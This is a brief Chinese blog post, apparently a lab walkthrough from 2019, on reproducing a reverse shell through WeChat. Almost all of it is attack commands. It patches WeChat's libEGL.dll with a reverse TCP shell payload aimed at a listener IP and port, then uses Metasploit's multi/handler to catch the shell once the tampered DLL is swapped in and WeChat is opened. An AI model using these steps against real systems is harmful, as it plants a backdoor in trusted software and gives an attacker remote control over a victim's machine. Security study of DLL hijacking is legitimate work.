2019.10.9wechat反弹shell复现

 

./backdoor.py -f libEGL.dll -s reverse_shell_tcp_inline -P 6666 -H 192.168.106.137

 

 

 

 

 

 

msfconsle 打开msf

 msf

use exploit/multi/handler

 

 

 

set payload windows/shell_reverse_tcp

 

 

 

show options 查看配置

 

 

 

set lhost lport

 

 

 

 

exploit

 

 

 

windows7 替换dll文件,打开微信

kali 接收到反弹的shell

 

 

posted @ 2019-10-31 08:33  火狐隆美尔  阅读(109)  评论(0编辑  收藏  举报